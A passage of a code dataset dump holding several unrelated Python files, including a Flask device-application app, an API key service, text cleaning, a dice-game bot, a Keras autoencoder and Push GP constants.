analysis_violations = int(poll_analysis['summary']['violations'])\n analysis_complex_functions = int(poll_analysis['summary']['complexFunctions'])\n analysis_long_functions = int(poll_analysis['summary']['longFunctions'])\n analysis_total_functions = int(poll_analysis['summary']['totalFunctions'])\n analysis_score = poll_analysis['techdebt']['score']\n analysis_grade = poll_analysis['techdebt']['grade']\n\n if analysis_slocs > 0:\n if analysis_total_functions > 0:\n analysis_complex_function_rate = analysis_complex_functions / analysis_total_functions\n analysis_long_function_rate = analysis_long_functions / analysis_total_functions\n else:\n analysis_complex_function_rate = 0\n analysis_long_function_rate = 0\n\n analysis_violations_rate = analysis_violations / analysis_slocs\n else:\n analysis_complex_function_rate = 0\n analysis_long_function_rate = 0\n analysis_violations_rate = 0\n\n logging.info(\"analysis_score: %s\", analysis_score)\n logging.info(\"analysis_grade: %s\", analysis_grade)\n logging.info(\"analysis_violations_rate: %s\", analysis_violations_rate)\n logging.info(\"analysis_complex_function_rate: %s\", analysis_complex_function_rate)\n logging.info(\"analysis_long_function_rate: %s\", analysis_long_function_rate)\n\n if analysis_score and min_quality_score is not None and analysis_score < min_quality_score:\n log.info(\"analysis score %s is lower than minimum expected score %s\", analysis_score, min_quality_score)\n sys.exit(1)\n\n if max_complex_functions_rate is not None and analysis_complex_function_rate > max_complex_functions_rate:\n log.info(\"complex function rate %s is higher than maximum %s\", analysis_complex_function_rate, max_complex_functions_rate)\n sys.exit(1)\n\n if max_long_functions_rate is not None and analysis_long_function_rate > max_long_functions_rate:\n log.info(\"long function rate %s is higher than maximum %s\", analysis_long_function_rate, max_long_functions_rate)\n sys.exit(1)\n\n if max_defects_rate is not None and analysis_violations_rate > max_defects_rate:\n log.info(\"violation rate %s is higher than maximum %s\", analysis_violations_rate, max_defects_rate)\n sys.exit(1)\n\n if min_quality_grade_argument is not None and is_grade_lower(analysis_grade, min_quality_grade_argument):\n log.info(\"grade %s is lower than grade %s\", analysis_grade, min_quality_grade_argument)\n sys.exit(1)\n\n log.info(\"Everything is fine, all conditions passed\")\n sys.exit(0)\n\n sys.exit(0)\n except KeyboardInterrupt: # pragma: no cover\n log.info('Aborted')\n sys.exit(1)\n sys.exit(0)\n","sub_path":"code_inspector/check_quality.py","file_name":"check_quality.py","file_ext":"py","file_size_in_byte":11070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"311884213","text":"from . import apply\nfrom .forms import DeviceForm, ConfirmForm, ApplicationTable, DeviceTable # ChoiceObj\nfrom flask import render_template, flash # session\nfrom flask_login import login_required, current_user\n# from ..decorators import admin_required\nfrom ..models import Device, User, user_device, ApplicationLog\nfrom ..email import send_email\nfrom .. import db\nfrom sqlalchemy import desc\nimport ast\nfrom pytz import timezone\n\ntzchina = timezone('Asia/Shanghai')\nutc = timezone('UTC')\n\nemail_receiver = ['peixindu@nami.org.hk', 'jimmywlhon@nami.org.hk']\n\n\n@apply.route('/device', methods=['GET', 'POST'])\n@login_required\ndef apply_device():\n devices = Device.query.filter(~Device.name.op('regexp')('test.*')).all()\n uds = db.session.query(user_device).filter_by(user_id=current_user.id).all()\n ds = []\n for ud in uds:\n device = Device.query.filter_by(id=ud.device_id).first()\n for d in devices:\n if device.id == d.id:\n devices.remove(d)\n ds.append({\n \"device_id\": d.id,\n \"device_name\": d.name,\n \"device_status\": d.status,\n \"device_details\": d.details\n })\n # selectedChoices = ChoiceObj('devices', session.get(selected))\n # form = DeviceForm(obj=selectedChoices, devices=devices)\n if len(ds) == 0:\n table = None\n else:\n table = DeviceTable(ds)\n if len(devices) == 0:\n return render_template('apply/apply_device.html', form=None, table=table)\n form = DeviceForm(devices=devices)\n if form.validate_on_submit():\n # session['selected'] = form.devices.data\n # print(form.device.data)\n if form.device.data is None:\n flash('Please choose one instrument for application.')\n else:\n device_id = form.device.data\n device_name = []\n for id in device_id:\n device = Device.query.filter_by(id=id).first()\n device_name.append((id, device.name))\n user_email = current_user.email\n application = ApplicationLog(user_email=user_email,\n devices=str(device_id))\n try:\n db.session.add(application)\n db.session.commit()\n for i in email_receiver:\n send_email(i, 'Device Privilege Application',\n 'apply/email/application',\n user_email=user_email,\n device_name=device_name)\n flash('Your application has been sent to admin,'\n ' Please wait for confirmation.')\n except:\n db.session.rollback()\n db.session.flush()\n flash('Some errors occurs, please contact Admin for help.')\n else:\n pass\n # flash(form.errors)\n return render_template('apply/apply_device.html', form=form, table=table)\n\n\n@apply.route('/confirm/', methods=['GET', 'POST'])\n@login_required\n# @admin_required\ndef confirm(user_email):\n if current_user.email not in email_receiver and current_user.email != 'harold@harold.com':\n return render_template('403.html'), 403\n application = ApplicationLog.query.filter_by(user_email=user_email).order_by(desc(ApplicationLog.id)).first_or_404()\n if application.application_state == 'Apply':\n applications = ApplicationLog.query.filter_by(user_email=user_email).filter_by(application_state='Apply'). \\\n order_by(desc(ApplicationLog.id)).all()\n # print(type(application.devices))\n # devices = [int(d.strip()) for d in ast.literal_eval(application.devices)]\n d_list = []\n id_list = []\n for application in applications:\n devices = [int(d) for d in ast.literal_eval(application.devices)]\n # print(type(devices))\n for d in devices:\n if d not in id_list:\n id_list.append(d)\n d_list.append(Device.query.filter_by(id=d).first())\n else:\n continue\n form = ConfirmForm(devices=d_list)\n if form.validate_on_submit():\n c_devices = form.device.data\n user = User.query.filter_by(email=user_email).first_or_404()\n d_names = []\n for c_d in c_devices:\n c_d = Device.query.filter_by(id=int(c_d)).first_or_404()\n c_d.users.append(user)\n d_names.append(c_d.name)\n db.session.add(c_d)\n for application in applications:\n application.approved_devices = str([x for x in ast.literal_eval(application.devices)\n if int(x) in c_devices])\n application.application_state = 'Approved'\n db.session.add(application)\n try:\n db.session.commit()\n send_email(user_email, 'Application Confirmed',\n 'apply/email/approve',\n devices=d_names)\n flash('User Device approved.')\n except Exception as e:\n db.session.rollback()\n db.session.flush()\n print(e)\n flash('Error Occurs!')\n else:\n a_dict = {'user_email': application.user_email,\n 'devices': application.devices,\n 'application_time': application.application_time.replace(tzinfo=utc).astimezone(tzchina).strftime(\n '%Y/%m/%d-%H:%M:%S'),\n 'handled_time': application.handled_time.replace(tzinfo=utc).astimezone(tzchina).strftime(\n '%Y/%m/%d-%H:%M:%S'),\n 'approved_devices': application.approved_devices,\n 'application_state': application.application_state}\n table = ApplicationTable([a_dict])\n return render_template('apply/handled.html', table=table)\n return render_template('apply/confirm.html', user_email=user_email, form=form)\n\n\n@apply.route('/reject/', methods=['GET', 'POST'])\n@login_required\n# @admin_required\ndef reject(user_email):\n # print(user_email)\n if current_user.email not in email_receiver and current_user.email != 'harold@harold.com':\n return render_template('403.html'), 403\n application = ApplicationLog.query.filter_by(user_email=user_email).filter_by(application_state='Apply').order_by(\n desc(ApplicationLog.id)).first()\n application.application_state = 'Rejected'\n try:\n db.session.add(application)\n db.session.commit()\n except:\n db.session.rollback()\n db.session.flush()\n send_email(user_email, 'Application Rejected',\n 'apply/email/reject')\n flash('Reject email has been sent to user.')\n return render_template('apply/reject.html')\n","sub_path":"test_device_appointment_system/app/apply/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"118050420","text":"from datetime import datetime\nimport random\nimport string\n\nfrom passlib.hash import pbkdf2_sha256\n\nfrom middlewared.schema import accepts, Bool, Dict, Int, Str, Patch\nfrom middlewared.service import CRUDService, private, ValidationErrors\nfrom middlewared.service_exception import MatchNotFound\nimport middlewared.sqlalchemy as sa\n\n\nclass APIKeyModel(sa.Model):\n __tablename__ = \"account_api_key\"\n\n id = sa.Column(sa.Integer(), primary_key=True)\n name = sa.Column(sa.String(200))\n key = sa.Column(sa.Text())\n created_at = sa.Column(sa.DateTime())\n\n\nclass ApiKeyService(CRUDService):\n\n class Config:\n namespace = \"api_key\"\n datastore = \"account.api_key\"\n datastore_extend = \"api_key.item_extend\"\n\n @private\n async def item_extend(self, item):\n item.pop(\"key\")\n return item\n\n @accepts(\n Dict(\n \"api_key_create\",\n Str(\"name\", required=True, empty=False),\n register=True\n )\n )\n async def do_create(self, data):\n \"\"\"\n Creates API Key.\n\n `name` is a user-readable name for key.\n \"\"\"\n await self._validate(\"api_key_create\", data)\n\n key = self._generate()\n data[\"key\"] = pbkdf2_sha256.encrypt(key)\n\n data[\"created_at\"] = datetime.utcnow()\n\n data[\"id\"] = await self.middleware.call(\n \"datastore.insert\",\n self._config.datastore,\n data\n )\n\n return self._serve(data, key)\n\n @accepts(\n Int(\"id\", required=True),\n Patch(\n \"api_key_create\",\n \"api_key_update\",\n (\"add\", Bool(\"reset\")),\n (\"attr\", {\"update\": True}),\n )\n )\n async def do_update(self, id, data):\n \"\"\"\n Update API Key `id`.\n\n Specify `reset: true` to reset this API Key.\n \"\"\"\n reset = data.pop(\"reset\", False)\n\n old = await self._get_instance(id)\n new = old.copy()\n\n new.update(data)\n\n await self._validate(\"api_key_update\", new, id)\n\n key = None\n if reset:\n key = self._generate()\n new[\"key\"] = pbkdf2_sha256.encrypt(key)\n\n await self.middleware.call(\n \"datastore.update\",\n self._config.datastore,\n id,\n new,\n )\n\n return self._serve(await self._get_instance(id), key)\n\n @accepts(\n Int(\"id\")\n )\n async def do_delete(self, id):\n \"\"\"\n Delete API Key `id`.\n \"\"\"\n response = await self.middleware.call(\n \"datastore.delete\",\n self._config.datastore,\n id\n )\n\n return response\n\n @private\n async def authenticate(self, key):\n try:\n key_id, key = key.split(\"-\", 1)\n key_id = int(key_id)\n except ValueError:\n return None\n\n try:\n db_key = await self.middleware.call(\"datastore.query\", \"account.api_key\", [(\"id\", \"=\", key_id)],\n {\"get\": True})\n except MatchNotFound:\n return None\n\n if not pbkdf2_sha256.verify(key, db_key[\"key\"]):\n return None\n\n return db_key\n\n async def _validate(self, schema_name, data, id=None):\n verrors = ValidationErrors()\n\n await self._ensure_unique(verrors, schema_name, \"name\", data[\"name\"], id)\n\n if verrors:\n raise verrors\n\n def _generate(self):\n return \"\".join([random.SystemRandom().choice(string.ascii_letters + string.digits) for _ in range(64)])\n\n def _serve(self, data, key):\n if key is None:\n return data\n\n return dict(data, key=f\"{data['id']}-{key}\")\n","sub_path":"src/middlewared/middlewared/plugins/api_key.py","file_name":"api_key.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"180289174","text":"###### Writer : \"Atia\"\n\n\n##### importing the Libraries\nimport csv\nimport re\nimport pandas as pd\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 200)\nfrom nltk.stem.porter import *\nfrom nltk.tokenize import word_tokenize\nfrom gensim.parsing.preprocessing import remove_stopwords\nfrom nltk.stem.wordnet import WordNetLemmatizer\nLem = WordNetLemmatizer()\nimport os\n\n\nos.chdir(\"/Users/macbook/Documents/pyhton/portfolio/Keyword_Frequency/Text_Cleaning\")\n####### reading the csv file\nraw_data = []\nwith open(\"Raw_Text.csv\") as mi:\n reader = csv.reader(mi)\n for line in reader:\n raw_data.append(line)\n\ntotal_data = []\n\nfor x in raw_data:\n\n text = x[3]\n ##### text is a string here, so we need to clean it\n script = text.split(\"'\")\n for sent in script:\n temp = x[:3]\n sent = re.sub(r\"[!”#$%&()*+,-./:;<=>\\\"\\'?@[\\]^_`{|}~–’]\", \" \", sent)\n sent = sent.lower()\n\n #### removing the numbers\n sent = re.sub(r\"\\d+\", \"\", sent)\n\n #### removing the empty spaces\n sent = sent.strip()\n\n #### removing the the stopwords\n sent = remove_stopwords(sent)\n sent = re.sub(r\"'\", \" \", sent)\n\n ######removing the apastroph\n sent = re.sub(\"(’\\w+) ?\", \" \", sent)\n\n ######Separate teh words\n input_str = word_tokenize(sent)\n singledata = []\n\n for wo in input_str:\n lemword = Lem.lemmatize(wo)\n pattern = re.compile(r\"(.)\\1{2,}\")\n wo = pattern.sub(r\"\\1\\1\", lemword)\n if len(wo) > 1:\n singledata.append(lemword)\n\n s = \" \".join(singledata)\n if s != \"\":\n temp.append(s)\n\n if len(temp) > 3:\n total_data.append(temp)\n\n\ndf = pd.DataFrame(total_data)\ndf.columns = [\"city\", \"page\", \"source\", \"text\"]\npath = \"clean_data_ready_for_count.xlsx\"\n\n### remove teh file if it already exists\nif os.path.exists(path):\n os.remove(path)\n\ndf.to_excel(path)\n\n\n\n","sub_path":"Text_Cleaning/text_cleaning.py","file_name":"text_cleaning.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"326264526","text":"# -*- coding:utf-8 -*-\n# Author:YEAR\n\nimport tornado.web\nimport os\nimport sys\n# sys.path.append(r\"A:\\development\\source_code\\oldBoyPython\\lowChouti\\backend\")\nfrom lowChouti.backend.core.request_handler import BaseHandler\n# import core.request_handler\nfrom lowChouti.backend import commons\nimport json\nfrom lowChouti.backend.utils import url\nfrom urllib import request\nimport re\nfrom lowChouti.models import chouti_orm\nfrom lowChouti.backend.session import session\nimport datetime\n\n\n\nclass urlTitleHandler(BaseHandler):\n def get(self, *args, **kwargs):\n print(\"[GET]:urlTitle\")\n\n def post(self, *args, **kwargs):\n ret = {\"status\": True, \"data\": \"\", \"error\": \"链接不正确\"}\n print(\"[POST]:urlTitle\")\n strurl = self.get_argument(\"rURL\", None)\n if re.match('http', strurl) == None:\n strurl = 'http://' + strurl\n strHtml = request.urlopen(strurl).read()\n title = url.get_title_bs(strHtml)\n description = url.get_description_bs(strHtml)\n ret[\"title\"]=title\n ret[\"desc\"]=description\n self.write(json.dumps(ret))\n\nclass publishHandler(BaseHandler):\n def get(self, *args, **kwargs):\n print(\"[GET]:publish\")\n\n def post(self, *args, **kwargs):\n ret={\"status\":True, \"data\":\"\",\"error\":\"发布失败\"}\n print(\"[POST]:publish\")\n userID=self.session[\"userNID\"]\n conn=chouti_orm.Session()\n kind=self.get_argument(\"kind\")\n if kind=='0':\n strurl = self.get_argument(\"link\", None)\n if re.match('http', strurl) == None:\n strurl = 'http://' + strurl\n obj=chouti_orm.News(user_info_id=userID,\n news_type_id=1,\n ctime=datetime.datetime.now(),\n title=self.get_argument(\"title\",None),\n url=strurl,\n Content=self.get_argument(\"zhaiyao\",None))\n conn.add(obj)\n conn.commit()\n elif kind=='1':\n obj = chouti_orm.News(user_info_id=userID,\n news_type_id=2,\n ctime=datetime.datetime.now(),\n title=\"这就是一个段子。。。\",\n url=\"\",\n Content=self.get_argument(\"zhaiyao\",None))\n conn.add(obj)\n conn.commit()\n elif kind=='2':\n obj = chouti_orm.News(user_info_id=userID,\n news_type_id=3,\n ctime=datetime.datetime.now(),\n title=\"这就是一个图片。。。\",\n url=self.get_argument(\"filelink\",None),\n Content=self.get_argument(\"zhaiyao\", None))\n conn.add(obj)\n conn.commit()\n self.write(json.dumps(ret))\n\n","sub_path":"lowChouti/controllers/publish.py","file_name":"publish.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"163569609","text":"\"\"\"\n============================\nAuthor:柠檬班-木森\nTime:2019/11/15\nE-mail:3247119728@qq.com\nCompany:湖南零檬信息技术有限公司\n============================\n\"\"\"\n\"\"\"\n这个文件是测试程序运行的启动文件\n\n\"\"\"\nimport unittest\n\nfrom HTMLTestRunnerNew import HTMLTestRunner\n\n# 第一步,创建一个测试套件\nsuite = unittest.TestSuite()\n\n# 第二步:将测试用例,加载到测试套件中\n\n# 第1种,通过模块去加载用例\n# 创建一个加载对象\nimport testcases\n\nloader = unittest.TestLoader()\nsuite.addTest(loader.loadTestsFromModule(testcases))\n\n# 第2种:通过测试用例类去加载\n# import testcases\n# loader = unittest.TestLoader()\n# suite.addTest(loader.loadTestsFromTestCase(testcases.LoginTestCase))\n\n# 第3种 :添加单条测试用例\n# from testcases import LoginTestCase\n# 创建一个用例对象\n# 注意点:通过用例类去创建测试用例对象的时候,需要传入用例的方法名(字符串类型)\n# case = LoginTestCase(\"test_login_pass\")\n# suite.addTest(case)\n\n# 第4种,指定测试用例的所在的目录路径,进行加载()\n# loader = unittest.TestLoader()\n# suite.addTest(loader.discover(r\"用例文件所在的目录的绝对路径\"))\n\n\n# 第三步:创建一个测试运行程序启动器\nrunner = HTMLTestRunner(stream=open(\"report.html\", \"wb\"), # 打开一个报告文件,将句柄传给stream\n tester=\"musen,小明。大哥\", # 报告种显示的测试人员\n description=\"python24第一份测试报告\", # 报告种显示描述信息\n title=\"24期上课的测试报告\") # 报告的标题\n\n# 第四步:使用启动器去执行测试套机\nrunner.run(suite)\n","sub_path":"02单元测试搭建/py24_13day/runtest2.py","file_name":"runtest2.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"437851270","text":"import zmq\nimport math\nimport sys\nimport json\nimport pdb\n\nclass Game:\n def __init__(self):\n self.bidPips = None\n self.bidSize = None\n self.myHand = {1:0, 2:0, 3:0, 4:0, 5:0, 6:0}\n self.oppDice = 0\n self.onesOn = True\n\n @staticmethod\n def choose(n, k):\n return math.factorial(n) / (math.factorial(k) * math.factorial(n-k))\n\n def handSize(self):\n size = 0\n #pdb.set_trace()\n\n for pips in self.myHand.keys():\n size += self.myHand[pips]\n\n return size\n\n def totalDice(self):\n return self.handSize() + self.oppDice\n\n def pMatch(self):\n return (1.0/3.0) if self.onesOn else (1.0/6.0)\n\n def success(self):\n target = self.bidSize - self.myHand[self.bidPips]\n\n if self.onesOn:\n target -= self.myHand[1]\n\n if target <= 0:\n return 1.0\n\n pSuccess = 0.0\n\n for i in xrange(target, self.oppDice + 1):\n inc = Game.choose(self.oppDice, i) * self.pMatch() ** i * (1 - self.pMatch()) ** (self.oppDice - i) \n pSuccess += inc\n \n return pSuccess\n\n def initialBid(self):\n count = self.myHand[self.mode()]\n\n if self.onesOn:\n count += self.myHand[1]\n\n count += int(self.oppDice * self.pMatch())\n\n return [count, self.mode()]\n\n def mode(self):\n count = 0\n mode = 0\n\n # TODO: handles the hand of all 1s badly\n for i in xrange(2 if self.onesOn else 1, 7):\n if self.myHand[i] >= count:\n count = self.myHand[i]\n mode = i\n\n return mode\n\n def nextBid(self):\n if self.bidPips != 6:\n newSize = self.bidSize\n newPips = self.bidPips + 1\n else:\n newSize = self.bidSize + 1\n if self.onesOn:\n newPips = 2\n else:\n newPips = 1\n\n return [newSize, newPips]\n\n\n def setState(self, res):\n self.myHand = {1:0, 2:0, 3:0, 4:0, 5:0, 6:0}\n\n if res[\"history\"]:\n self.bidSize = int(res[\"history\"][-1][0])\n self.bidPips = int(res[\"history\"][-1][-1])\n else:\n self.bidSize = None\n self.bidPips = None\n\n if res[\"game_complete\"]:\n sys.exit(\"Game over, %s won\" % res[\"winner\"])\n\n self.oppDice = int(res[\"oppenent_dice_num\"])\n self.onesOn = res[\"ones_valid\"]\n\n for pips in res[\"dice\"]:\n self.myHand[pips] += 1\n\n if res[\"winner\"] and not len(res[\"history\"]):\n print(\"Round over, %s wins. Opponent's dice: %s\" % (res[\"winner\"], res[\"opponent_dice\"]))\n return -1\n\nname = raw_input(\"name: \")\n\ncontext = zmq.Context()\nsocket = context.socket(zmq.REQ)\nsocket.setsockopt(zmq.IDENTITY, name)\nsocket.connect(\"tcp://localhost:5555\")\nsocket.send(\"register\")\n\nbotId = socket.recv()\n\nif botId == '0':\n sys.exit(\"Duplicate bot name?\")\n\nsocket = context.socket(zmq.REQ)\nsocket.setsockopt(zmq.IDENTITY, botId)\nsocket.connect(\"tcp://localhost:5555\")\nsocket.send(\"start\")\n\ngame = Game()\n\ndef handleTurn():\n res = json.loads(socket.recv())\n\n if 'error' in res:\n print(\"Error: %s\" % res['error'])\n pdb.set_trace()\n\n print(res)\n\n if game.setState(res) == -1:\n socket.send('next')\n return\n\n if game.bidSize != None:\n pSuccess = game.success()\n print(pSuccess)\n if pSuccess < 0.5:\n socket.send(\"0,0\")\n else:\n size, pips = game.nextBid()\n socket.send(\"%s,%s\" % (size, pips))\n else:\n size, pips = game.initialBid()\n socket.send(\"%s,%s\" % (size, pips))\n\n\nwhile True:\n handleTurn()\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"272812151","text":"from audz import Audz\n\naudz = Audz()\n\ndef main():\n\tloop()\n\taudz.terminate()\n\ndef loop():\n\trunning = True\n\n\twhile(running):\n\t\tcmd = input('audz> ')\n\t\tif not evaluate(cmd):\n\t\t\trunning = False\n\ndef evaluate(cmd):\n\tcmdList = cmd.split()\n\tif len(cmdList) == 0:\n\t\treturn True\n\telif cmdList[0] == 'quit':\n\t\treturn False\n\telif cmdList[0] == 'play':\n\t\tplay(cmdList[1:])\n\telif cmdList[0] == 'pause':\n\t\taudz.pause()\n\telif cmdList[0] == 'stop':\n\t\taudz.stop()\n\n\treturn True\n\ndef play(cmdList):\n\tif len(cmdList) == 0:\n\t\taudz.play()\n\telif cmdList[0] == 'song':\n\t\tplay_song(cmdList[1:])\n\ndef play_song(cmdList):\n\tif len(cmdList) == 0:\n\t\tpass\n\telse:\n\t\taudz.loadSong(cmdList[0])\n\t\taudz.play()\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"c/audz/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"567313476","text":"# coding=utf-8\n\nimport os\nimport os.path\nimport re\nimport requests\nimport HTMLParser \nimport chardet\nfrom check_A import check\nfrom check_A import check_whois\n\n# dir = \"../subject1_sample/file\"\nblack_list = ['手机', '银行版权所有']\n\ndef bank_check(text, filename):\n\n\t# file = open(dir + '/' + filename, 'rb')\n\t# try:\n\t\t# text = file.read()\n\n\tif '行' in text or '银' in text:\n\t\ttry:\n\t\t\t# print chardet.detect(text)\n\t\t\tt = HTMLParser.HTMLParser();\n\t\t\ttext = t.unescape(text)\n\n\t\t\tmessage = check(filename)\n\n\t\t\tmess = re.split(',', message)\n\t\t\turl = mess[-1]\t\t\n\t\t\t# print message\n\t\t\t\n\t\t\tfor black in black_list:\n\t\t\t\tif black not in text:\n\t\t\t\t\treturn tuple([True, mess[0]])\n\n\t\t\t\n\t\t\tif check_whois([\"银行\", \"Bank\", \"bank\", \"BANK\"], url):\n\t\t\t\treturn tuple([True, mess[0]])\n\t\t\telse:\n\t\t\t\t# print message\n\t\t\t\treturn tuple([False, mess[0]+\",p\"])\n\n\t\texcept UnicodeDecodeError:\n\t\t\tpass\n\n\t\n\telse:\t\t\n\t\tmessage = check(filename)\n\n\t\tmess = re.split(',', message)\n\t\turl = mess[-1]\t\t\n\n\t\tfor black in black_list:\n\t\t\tif black not in text and black.decode('utf-8', 'ignore').encode('gb2312') not in text:\n\t\t\t\treturn tuple([True, mess[0]])\n\n\t\t\n\t\tif check_whois([\"银行\", \"Bank\", \"bank\", \"BANK\"], url):\n\t\t\treturn tuple([True, mess[0]])\n\t\telse:\n\t\t\t# print message\n\t\t\treturn tuple([False, mess[0]+\",p\"])","sub_path":"check/bank_check.py","file_name":"bank_check.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"176380913","text":"from itertools import groupby\r\n\r\nnumbers = [0,0,0,1,1,1,0,0,0,1,1,0,1,1,1,1,0,0,1,1]\r\nbig = 0\r\nfor i,j in groupby(numbers):\r\n d = list(j)\r\n if i==1:\r\n if len(d)>big:\r\n big=len(list(d))\r\nprint('maximum consecutive 1 are :',big)\r\n\r\n","sub_path":"Question 2.py","file_name":"Question 2.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"364956518","text":"from django.contrib.admin.views.decorators import staff_member_required\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import Permission\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import render, get_object_or_404, redirect\n\nfrom bot.controllers.order import create_order, proceed_order, edit_order\nfrom bot.models import Market, Order\n\n\n@login_required(login_url='login')\ndef insight_message(request):\n error_message = None\n if request.method == 'POST':\n order, message = create_order(request.POST, not_save=True)\n if not request.user.has_perm('bot.can_%s' % order.market.name):\n raise PermissionDenied()\n order.save()\n proceed_order(order)\n markets = Market.objects.all()\n return render(request, 'orders/edit_order.html', context={'error': error_message, 'markets': markets})\n\n\n@login_required(login_url='login')\ndef insight_list(request):\n orders = Order.objects.order_by('-date', '-id').all()\n return render(request, 'orders/orders.html', context={\n 'orders': orders\n })\n\n\n@login_required(login_url='login')\ndef edit_insight(request, order_id):\n message = None\n order = get_object_or_404(Order, id=order_id)\n if not request.user.has_perm('bot.can_%s' % order.market.name):\n raise PermissionDenied()\n if request.method == 'POST':\n order, message = edit_order(order, request.POST, edit=True)\n if order:\n return redirect('insight_list')\n return render(request, 'messages/edit_message.html', context={\n 'message': order, 'error': message\n })","sub_path":"bot/views/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"251921690","text":"# Imports\nfrom keras.layers import *\nfrom keras.layers.advanced_activations import *\nfrom keras.layers.convolutional import *\nfrom keras.models import *\nfrom keras.optimizers import *\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mnist_data import *\n\n# Load MNIST dataset\ndata = MNIST()\nx_train, _ = data.get_train_set()\nx_test, _ = data.get_test_set()\n\n# Encoded dimension\nencoding_dim = 32\n\n# Keras Model: Autoencoder\n# Input Tensors\ninput_img = Input(shape=(28,28,1,))\ninput_img_flatten = Flatten()(input_img)\n# Encoder Part\nencoded = Dense(256, activation=\"relu\")(input_img_flatten) # 784 => 256\nencoded = Dense(128, activation=\"relu\")(encoded) # 256 => 128\nencoded = Dense(encoding_dim, activation=\"relu\")(encoded) # 128 => 32\n# Decoder Part\ndecoded = Dense(128, activation=\"relu\")(encoded) # 32 => 128\ndecoded = Dense(256, activation=\"relu\")(encoded) # 128 => 256\ndecoded = Dense(784, activation=\"sigmoid\")(encoded) # 256 => 784\n# Output Tensors\noutput_img = Reshape((28,28,1,))(decoded)\nautoencoder = Model(input=input_img, output=output_img)\n\n# Training\nautoencoder.compile(optimizer=\"adadelta\", loss=\"binary_crossentropy\")\nautoencoder.fit(x_train, x_train, epochs=50, batch_size=128, validation_data=(x_test, x_test))\n\n# Testing\ntest_images = x_test[:10]\ndecoded_imgs = autoencoder.predict(test_images)\n\n# PLot test images\nplt.figure(figsize=(12,6))\nfor i in range(10):\n # Original image\n ax = plt.subplot(2 , 10, i+1)\n plt.imshow(test_images[i].reshape(28,28), cmap=\"gray\")\n # Decoded image\n ax = plt.subplot(2 , 10, i+1+10)\n plt.imshow(decoded_imgs[i].reshape(28,28), cmap=\"gray\")\nplt.show()","sub_path":"Udemy/Udemy-GAN-Kurs/Udemy GAN Kurs/Abschnitt7 - Autoencoder/1 - Autoencoder/deepautoencoder.py","file_name":"deepautoencoder.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"538972510","text":"\n# From a list containing ints, strings and floats, make three lists to store them separately\n# Using range(1,101), make two list, one containing all even numbers and other containing all odd numbers.\n \n\n# 2개의 리스트 먼저 선언\n# for 룹으로 1 부터 101까지 each 만들어주기\n# 각 loop 마다 odd 인지, even 넘버 인지 if 문 작성하기\n# 프린트 하기\n\n\noddList = []\nevenList = []\n#variable은 항상 소문자로 시작!!! odd list -> oddList, even list -> evenList => Camel writing \n\nfor each in range(1,101):\n if each % 2 == 0:#for even nums\n evenList.append(each)\n elif each % 2 == 1:\n oddList.append(each)\n\nprint(oddList, evenList)","sub_path":"Lectures/lecture8.py","file_name":"lecture8.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"372310024","text":"# _*_ coding: utf_8 _*_\r\n\"\"\"\r\nThe :mod:`constants` module provides global variables that are used by\r\nthe push interpreter and GP modules.\r\n\r\nThese definitions are mostly used by instructions to keep computed values within\r\nlimitscor when using random instructions. These values do not generally need\r\nto be tuned to improve GP performance.\r\n\"\"\"\r\n\r\n#: List of stack types that the ``pyshgp`` Push interpreter can handle.\r\npysh_types = ['_exec', '_integer', '_float', '_string', '_char', '_boolean',\r\n '_code', '_auxiliary', '_vector_integer', '_vector_float',\r\n '_vector_boolean', '_vector_string']\r\n\r\n#: Used by keep_number_reasonable as the maximum size of any integer or float\r\nmax_number_magnitude = 1000000000000\r\n\r\n#: Used by keep_number_reasonable as the minimum magnitude of any float\r\nmin_number_magnitude = 1.0E-10\r\n\r\n#: Used by string instructions to ensure that strings don't get too large\r\nmax_string_length = 5000\r\n\r\n#: Used by vector instructions to ensure that vectors don't get too large\r\nmax_vector_length = 5000\r\n\r\n#: The minumum value created by the integer_rand instruction\r\nmin_random_integer = -10\r\n\r\n#: The maximum value created by the integer_rand instruction\r\nmax_random_integer = 10\r\n\r\n#: The minumum value created by the float_rand instruction\r\nmin_random_float = -1.0\r\n\r\n#: The maximum value created by the float_rand instruction\r\nmax_random_float = 1.0\r\n\r\n#: The minimum length of string created by the string_rand instruction\r\nmin_random_string_length = 1\r\n\r\n#: The maximum length of string created by the string_rand instruction\r\nmax_random_string_length = 10\r\n\r\n#: The maximum length of code created by the code_rand instruction\r\nmax_points_in_random_expressions = 50\r\n\r\n\r\n#: The number of Push instructions that can be evaluated before 